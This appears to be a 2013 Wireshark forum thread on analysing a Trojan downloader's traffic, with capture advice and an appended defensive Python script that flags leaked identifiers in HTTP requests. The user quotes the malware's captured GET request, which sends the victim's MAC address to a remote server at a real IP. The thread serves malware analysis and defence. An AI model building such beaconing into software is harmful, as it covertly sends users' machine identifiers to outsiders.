Hello, I examined a Trojan downloader and found that it sends the local MAC address to a remote computer. Can you please help me to understand the process using Wireshark? BTW I use IDA Pro. asked 03 Feb '13, 12:26 Mimou Fares
2 Answers:
Have you captured the traffic of the computer that has the Trojan? That would be the first step - and please, don't do it ON the infected computer. Forensic captures are best taken by using a network TAP and another computer running capture software like Wireshark/dumpcap. If you don't have a TAP you can try capturing via a SPAN port. When you have a trace you could post it at www.cloudshark.org and post the URL. That way we can take a look at what you've got. answered 03 Feb '13, 14:49 Jasper ♦♦
Yes, it looks like a Trojan; at least SonicWall and McAfee say so (same IP address used: 64.247.39.247).
Regards answered 06 Feb '13, 12:52 Kurt Knochner ♦ edited 06 Feb '13, 12:55
Thank you for your answer. To capture the traffic I used Wireshark within the infected machine (virtual) and INetSim on the host. I had the following HTTP query:
GET /confirm.php?aid=0&said=0&mac=08:xx:27:xx:DC:83&mn=1489 HTTP/1.1
User-Agent: wget 3.0
Host: 64.247.39.247
Cache-Control: no-cache
It also seems that the Trojan sends the user name! Where can I find such relevant information? Thank you.
Well, basically you'll have to look through the trace you have and try to find any data transmitted that shouldn't be. POST or GET requests usually carry form data and parameters, so you should look at these. GET parameters are found in the URL, while POST parameters can be found at the bottom (line-based text data).
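As an added example (not from this thread or from the tools it mentions), a small Python script that does what the last answer describes: it pulls the GET parameters out of the URL and the form-encoded POST parameters out of the body, then flags values that are MAC addresses or that match identifiers the analyst collected from the infected machine. The two requests, the MAC, the Host address, the username and the hostname in it are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample requests modelled on the one quoted in the thread.
# The MAC, Host address, username and hostname are placeholders, not page values.
SAMPLE_GET = (
    "GET /confirm.php?aid=0&said=0&mac=00:11:22:33:44:55&mn=1489 HTTP/1.1\r\n"
    "User-Agent: wget 3.0\r\nHost: 198.51.100.10\r\nCache-Control: no-cache\r\n\r\n"
)
SAMPLE_POST = (
    "POST /report.php HTTP/1.1\r\nHost: 198.51.100.10\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 28\r\n\r\n"
    "user=alice&hostname=WORKSTN1"
)

MAC_RE = re.compile(r"^([0-9A-Fa-f]{2}[:-]){5}[0-9A-Fa-f]{2}$")


def request_params(raw):
    """Merge GET query parameters (from the URL) and form-encoded POST
    parameters (the body Wireshark shows as 'Line-based text data')."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    _method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    params = dict(parse_qsl(urlsplit(target).query, keep_blank_values=True))
    if "application/x-www-form-urlencoded" in headers.get("content-type", ""):
        params.update(parse_qsl(body, keep_blank_values=True))
    return params


def find_leaks(raw, local_ids):
    """Flag parameter values that are MAC addresses or that equal one of the
    identifiers collected from the infected machine (username, hostname, ...).
    Returns (param, value, reason) tuples in request order."""
    known = {i.lower() for i in local_ids}
    findings = []
    for name, value in request_params(raw).items():
        if MAC_RE.match(value):
            findings.append((name, value, "mac-address"))
        elif value.lower() in known:
            findings.append((name, value, "local-identifier"))
    return findings


if __name__ == "__main__":
    for req in (SAMPLE_GET, SAMPLE_POST):
        print(find_leaks(req, ["alice", "WORKSTN1"]))
```

To use it on a real capture, export the HTTP request from Wireshark (Follow TCP Stream, raw) and pass the text to find_leaks together with the username, hostname and MAC of the infected machine.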